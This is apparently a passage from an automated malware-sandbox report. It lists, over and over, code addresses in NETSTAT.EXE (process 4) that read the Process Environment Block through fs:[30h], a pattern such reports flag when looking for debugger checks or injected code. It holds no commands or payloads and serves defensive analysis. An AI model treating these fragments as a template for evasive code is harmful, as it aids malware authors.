          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1AA16 mov eax, dword ptr fs:[00000030h]4_2_02E1AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDAA16 mov eax, dword ptr fs:[00000030h]4_2_02EDAA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDAA16 mov eax, dword ptr fs:[00000030h]4_2_02EDAA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E33A1C mov eax, dword ptr fs:[00000030h]4_2_02E33A1C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]4_2_02E403E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]4_2_02E403E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]4_2_02E403E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]4_2_02E403E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]4_2_02E403E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E403E2 mov eax, dword ptr fs:[00000030h]4_2_02E403E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3DBE9 mov eax, dword ptr fs:[00000030h]4_2_02E3DBE9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E953CA mov eax, dword ptr fs:[00000030h]4_2_02E953CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E953CA mov eax, dword ptr fs:[00000030h]4_2_02E953CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h]4_2_02E44BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h]4_2_02E44BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E44BAD mov eax, dword ptr fs:[00000030h]4_2_02E44BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE5BA5 mov eax, dword ptr fs:[00000030h]4_2_02EE5BA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED138A mov eax, dword ptr fs:[00000030h]4_2_02ED138A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECD380 mov ecx, dword ptr fs:[00000030h]4_2_02ECD380
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E21B8F mov eax, dword ptr fs:[00000030h]4_2_02E21B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E21B8F mov eax, dword ptr fs:[00000030h]4_2_02E21B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E42397 mov eax, dword ptr fs:[00000030h]4_2_02E42397
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4B390 mov eax, dword ptr fs:[00000030h]4_2_02E4B390
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1DB60 mov ecx, dword ptr fs:[00000030h]4_2_02E1DB60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E43B7A mov eax, dword ptr fs:[00000030h]4_2_02E43B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E43B7A mov eax, dword ptr fs:[00000030h]4_2_02E43B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1DB40 mov eax, dword ptr fs:[00000030h]4_2_02E1DB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8B58 mov eax, dword ptr fs:[00000030h]4_2_02EE8B58
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1F358 mov eax, dword ptr fs:[00000030h]4_2_02E1F358
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED131B mov eax, dword ptr fs:[00000030h]4_2_02ED131B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h]4_2_02E140E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h]4_2_02E140E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E140E1 mov eax, dword ptr fs:[00000030h]4_2_02E140E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E158EC mov eax, dword ptr fs:[00000030h]4_2_02E158EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]4_2_02EAB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov ecx, dword ptr fs:[00000030h]4_2_02EAB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]4_2_02EAB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]4_2_02EAB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]4_2_02EAB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAB8D0 mov eax, dword ptr fs:[00000030h]4_2_02EAB8D0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]4_2_02E420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]4_2_02E420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]4_2_02E420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]4_2_02E420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]4_2_02E420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E420A0 mov eax, dword ptr fs:[00000030h]4_2_02E420A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E590AF mov eax, dword ptr fs:[00000030h]4_2_02E590AF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4F0BF mov ecx, dword ptr fs:[00000030h]4_2_02E4F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4F0BF mov eax, dword ptr fs:[00000030h]4_2_02E4F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4F0BF mov eax, dword ptr fs:[00000030h]4_2_02E4F0BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19080 mov eax, dword ptr fs:[00000030h]4_2_02E19080
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E93884 mov eax, dword ptr fs:[00000030h]4_2_02E93884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E93884 mov eax, dword ptr fs:[00000030h]4_2_02E93884
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE1074 mov eax, dword ptr fs:[00000030h]4_2_02EE1074
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED2073 mov eax, dword ptr fs:[00000030h]4_2_02ED2073
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E30050 mov eax, dword ptr fs:[00000030h]4_2_02E30050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E30050 mov eax, dword ptr fs:[00000030h]4_2_02E30050
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]4_2_02E2B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]4_2_02E2B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]4_2_02E2B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2B02A mov eax, dword ptr fs:[00000030h]4_2_02E2B02A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]4_2_02E4002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]4_2_02E4002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]4_2_02E4002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]4_2_02E4002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4002D mov eax, dword ptr fs:[00000030h]4_2_02E4002D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]4_2_02E3A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]4_2_02E3A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]4_2_02E3A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3A830 mov eax, dword ptr fs:[00000030h]4_2_02E3A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE4015 mov eax, dword ptr fs:[00000030h]4_2_02EE4015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE4015 mov eax, dword ptr fs:[00000030h]4_2_02EE4015
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h]4_2_02E97016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h]4_2_02E97016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97016 mov eax, dword ptr fs:[00000030h]4_2_02E97016
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h]4_2_02E1B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h]4_2_02E1B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1B1E1 mov eax, dword ptr fs:[00000030h]4_2_02E1B1E1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EA41E8 mov eax, dword ptr fs:[00000030h]4_2_02EA41E8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E461A0 mov eax, dword ptr fs:[00000030h]4_2_02E461A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E461A0 mov eax, dword ptr fs:[00000030h]4_2_02E461A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]4_2_02ED49A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]4_2_02ED49A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]4_2_02ED49A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED49A4 mov eax, dword ptr fs:[00000030h]4_2_02ED49A4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E969A6 mov eax, dword ptr fs:[00000030h]4_2_02E969A6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]4_2_02E951BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]4_2_02E951BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]4_2_02E951BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E951BE mov eax, dword ptr fs:[00000030h]4_2_02E951BE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov ecx, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E399BF mov eax, dword ptr fs:[00000030h]4_2_02E399BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3C182 mov eax, dword ptr fs:[00000030h]4_2_02E3C182
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A185 mov eax, dword ptr fs:[00000030h]4_2_02E4A185
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E42990 mov eax, dword ptr fs:[00000030h]4_2_02E42990
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1C962 mov eax, dword ptr fs:[00000030h]4_2_02E1C962
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1B171 mov eax, dword ptr fs:[00000030h]4_2_02E1B171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1B171 mov eax, dword ptr fs:[00000030h]4_2_02E1B171
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3B944 mov eax, dword ptr fs:[00000030h]4_2_02E3B944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3B944 mov eax, dword ptr fs:[00000030h]4_2_02E3B944
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]4_2_02E34120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]4_2_02E34120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]4_2_02E34120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E34120 mov eax, dword ptr fs:[00000030h]4_2_02E34120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E34120 mov ecx, dword ptr fs:[00000030h]4_2_02E34120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4513A mov eax, dword ptr fs:[00000030h]4_2_02E4513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4513A mov eax, dword ptr fs:[00000030h]4_2_02E4513A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h]4_2_02E19100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h]4_2_02E19100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E19100 mov eax, dword ptr fs:[00000030h]4_2_02E19100
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E276E2 mov eax, dword ptr fs:[00000030h]4_2_02E276E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E416E0 mov ecx, dword ptr fs:[00000030h]4_2_02E416E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E58EC7 mov eax, dword ptr fs:[00000030h]4_2_02E58EC7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E436CC mov eax, dword ptr fs:[00000030h]4_2_02E436CC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECFEC0 mov eax, dword ptr fs:[00000030h]4_2_02ECFEC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8ED6 mov eax, dword ptr fs:[00000030h]4_2_02EE8ED6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h]4_2_02EE0EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h]4_2_02EE0EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE0EA5 mov eax, dword ptr fs:[00000030h]4_2_02EE0EA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E946A7 mov eax, dword ptr fs:[00000030h]4_2_02E946A7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAFE87 mov eax, dword ptr fs:[00000030h]4_2_02EAFE87
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2766D mov eax, dword ptr fs:[00000030h]4_2_02E2766D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]4_2_02E3AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]4_2_02E3AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]4_2_02E3AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]4_2_02E3AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3AE73 mov eax, dword ptr fs:[00000030h]4_2_02E3AE73
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]4_2_02E27E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]4_2_02E27E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]4_2_02E27E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]4_2_02E27E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]4_2_02E27E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E27E41 mov eax, dword ptr fs:[00000030h]4_2_02E27E41
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDAE44 mov eax, dword ptr fs:[00000030h]4_2_02EDAE44
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDAE44 mov eax, dword ptr fs:[00000030h]4_2_02EDAE44
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1E620 mov eax, dword ptr fs:[00000030h]4_2_02E1E620
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ECFE3F mov eax, dword ptr fs:[00000030h]4_2_02ECFE3F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]4_2_02E1C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]4_2_02E1C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E1C600 mov eax, dword ptr fs:[00000030h]4_2_02E1C600
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E48E00 mov eax, dword ptr fs:[00000030h]4_2_02E48E00
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1608 mov eax, dword ptr fs:[00000030h]4_2_02ED1608
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A61C mov eax, dword ptr fs:[00000030h]4_2_02E4A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A61C mov eax, dword ptr fs:[00000030h]4_2_02E4A61C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E537F5 mov eax, dword ptr fs:[00000030h]4_2_02E537F5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E28794 mov eax, dword ptr fs:[00000030h]4_2_02E28794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]4_2_02E97794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]4_2_02E97794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E97794 mov eax, dword ptr fs:[00000030h]4_2_02E97794
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2FF60 mov eax, dword ptr fs:[00000030h]4_2_02E2FF60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8F6A mov eax, dword ptr fs:[00000030h]4_2_02EE8F6A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2EF40 mov eax, dword ptr fs:[00000030h]4_2_02E2EF40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E14F2E mov eax, dword ptr fs:[00000030h]4_2_02E14F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E14F2E mov eax, dword ptr fs:[00000030h]4_2_02E14F2E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4E730 mov eax, dword ptr fs:[00000030h]4_2_02E4E730
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE070D mov eax, dword ptr fs:[00000030h]4_2_02EE070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE070D mov eax, dword ptr fs:[00000030h]4_2_02EE070D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A70E mov eax, dword ptr fs:[00000030h]4_2_02E4A70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A70E mov eax, dword ptr fs:[00000030h]4_2_02E4A70E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3F716 mov eax, dword ptr fs:[00000030h]4_2_02E3F716
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAFF10 mov eax, dword ptr fs:[00000030h]4_2_02EAFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAFF10 mov eax, dword ptr fs:[00000030h]4_2_02EAFF10
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED14FB mov eax, dword ptr fs:[00000030h]4_2_02ED14FB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]4_2_02E96CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]4_2_02E96CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96CF0 mov eax, dword ptr fs:[00000030h]4_2_02E96CF0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE8CD6 mov eax, dword ptr fs:[00000030h]4_2_02EE8CD6
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2849B mov eax, dword ptr fs:[00000030h]4_2_02E2849B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E3746D mov eax, dword ptr fs:[00000030h]4_2_02E3746D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4A44B mov eax, dword ptr fs:[00000030h]4_2_02E4A44B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAC450 mov eax, dword ptr fs:[00000030h]4_2_02EAC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EAC450 mov eax, dword ptr fs:[00000030h]4_2_02EAC450
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E4BC2C mov eax, dword ptr fs:[00000030h]4_2_02E4BC2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]4_2_02EE740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]4_2_02EE740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EE740D mov eax, dword ptr fs:[00000030h]4_2_02EE740D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]4_2_02E96C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]4_2_02E96C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]4_2_02E96C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E96C0A mov eax, dword ptr fs:[00000030h]4_2_02E96C0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02ED1C06 mov eax, dword ptr fs:[00000030h]4_2_02ED1C06
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2D5E0 mov eax, dword ptr fs:[00000030h]4_2_02E2D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02E2D5E0 mov eax, dword ptr fs:[00000030h]4_2_02E2D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]4_2_02EDFDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]4_2_02EDFDE2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_02EDFDE2 mov eax, dword ptr fs:[00000030h]4_2_02EDFDE2
